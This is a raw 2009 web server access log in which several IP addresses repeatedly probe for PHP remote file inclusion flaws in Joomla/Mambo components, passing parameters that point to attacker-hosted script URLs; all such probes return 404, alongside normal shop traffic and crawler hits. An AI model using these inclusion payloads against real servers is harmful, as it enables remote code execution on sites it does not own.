218.38.136.251 - - [04/Sep/2009:03:10:49 -0400] "GET /logs/access_log.Q109050700%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:10:53 -0400] "GET /logs/error_log.Q109082500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:11:04 -0400] "GET /logs/error_log.Q109061400%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:11:13 -0400] "GET /logs/error_log.Q109060500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:11:16 -0400] "GET /logs/access_log.Q109071400%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:11:31 -0400] "GET /logs/error_log.Q109071400%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:11:40 -0400] "GET /logs/access_log.Q109071500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:11:43 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:11:46 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:11:58 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:11:58 -0400] "GET /logs/access_log.Q109052500%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:12:02 -0400] "GET /logs/error_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:12:02 -0400] "GET /logs/error_log.Q109060500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:12:06 -0400] "GET /logs/access_log.Q109061700%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:12:24 -0400] "GET /logs/error_log.Q109071500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:12:24 -0400] "GET /logs/error_log.Q109050700%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:12:24 -0400] "GET /logs/error_log.Q109051900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:12:30 -0400] "GET /logs/access_log.Q109052100%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:12:30 -0400] "GET /logs/error_log.Q109052200%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:12:36 -0400] "GET /logs/access_log.Q109072700%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.73.185.40 - - [04/Sep/2009:03:12:49 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.73.185.40 - - [04/Sep/2009:03:12:49 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.73.185.40 - - [04/Sep/2009:03:12:49 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:12:52 -0400] "GET /logs/error_log.Q109052500%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:12:52 -0400] "GET /logs/error_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:12:56 -0400] "GET /logs/error_log.Q109072700%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
24.61.50.47 - - [04/Sep/2009:03:13:03 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2D4E1517F400B035081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:04 -0400] "GET /images/fav_a-b.gif HTTP/1.1" 200 275 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2D4E1517F400B035081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
222.236.47.188 - - [04/Sep/2009:03:13:08 -0400] "GET /logs/access_log.Q109050700%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
24.61.50.47 - - [04/Sep/2009:03:13:15 -0400] "GET /images/fav_a-b.gif HTTP/1.1" 200 275 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2D4E1517F400B035081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
218.38.136.251 - - [04/Sep/2009:03:13:21 -0400] "GET /logs/access_log.Q109060500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:13:28 -0400] "GET /logs/access_log.Q109071500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
24.61.50.47 - - [04/Sep/2009:03:13:28 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG HTTP/1.1" 200 44370 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2D4E1517F400B035081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:30 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:30 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:30 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:30 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:30 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:30 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:30 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:30 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:30 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:30 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:30 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:30 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
222.236.47.188 - - [04/Sep/2009:03:13:32 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
24.61.50.47 - - [04/Sep/2009:03:13:32 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
203.236.100.30 - - [04/Sep/2009:03:13:33 -0400] "GET /logs/access_log.Q109072900//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
203.236.100.30 - - [04/Sep/2009:03:13:33 -0400] "GET /logs/error_log.Q109072900//main.php?sayfa=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
24.61.50.47 - - [04/Sep/2009:03:13:34 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:34 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:34 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:34 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:34 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:34 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:34 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:34 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:34 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:03:13:34 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
218.38.136.251 - - [04/Sep/2009:03:13:36 -0400] "GET /logs/access_log.Q109062900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
24.61.50.47 - - [04/Sep/2009:03:13:41 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L117B6A4301B74700721501R+M37+ENG HTTP/1.1" 200 44365 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010B2E421E1744009B35081+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
222.236.47.188 - - [04/Sep/2009:03:13:49 -0400] "GET /logs/access_log.Q109071400%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:14:00 -0400] "GET /logs/error_log.Q109071500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:14:06 -0400] "GET /logs/error_log.Q109071400%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:14:06 -0400] "GET /logs/access_log.Q109062700%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:14:07 -0400] "GET /logs/error_log.Q109051900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:14:12 -0400] "GET /logs/error_log.Q109062900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:14:12 -0400] "GET /logs/access_log.Q109051900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
69.73.185.40 - - [04/Sep/2009:03:14:26 -0400] "GET /logs/access_log.Q109063000//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:03:14:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.236.47.188 - - [04/Sep/2009:03:14:39 -0400] "GET /logs/access_log.Q109060500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:14:47 -0400] "GET /logs/access_log.Q109062900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.38.136.251 - - [04/Sep/2009:03:14:48 -0400] "GET /logs/error_log.Q109053100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:15:07 -0400] "GET /logs/error_log.Q109050700%20%20/modules/My_eGallery/index.php?basepath=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:15:08 -0400] "GET /logs/access_log.Q109062700%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:15:12 -0400] "GET /logs/error_log.Q109062900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
222.236.47.188 - - [04/Sep/2009:03:15:16 -0400] "GET /logs/access_log.Q109051900%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:03:15:39 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://jonrothbard.com/one.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:03:15:39 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://jonrothbard.com/one.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:03:15:40 -0400] "GET /logs/access_log.Q109082000/components/com_colorlab/admin.color.php?mosConfig_live_site=http://jonrothbard.com/one.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
118.107.163.230 - - [04/Sep/2009:03:15:40 -0400] "GET /logs/access_log.Q109052100/components/com_colorlab/admin.color.php?mosConfig_live_site=http://jonrothbard.com/one.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
74.6.22.87 - - [04/Sep/2009:03:16:18 -0400] "GET /logs/error_log.Q109081400 HTTP/1.0" 200 4307905 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.188 - - [04/Sep/2009:03:16:37 -0400] "GET /logs/error_log.Q109053100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
74.6.22.87 - - [04/Sep/2009:03:16:21 -0400] "GET /logs/error_log.Q109081400 HTTP/1.0" 200 4307905 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.108.131.141 - - [04/Sep/2009:03:17:07 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:17:07 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:17:07 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
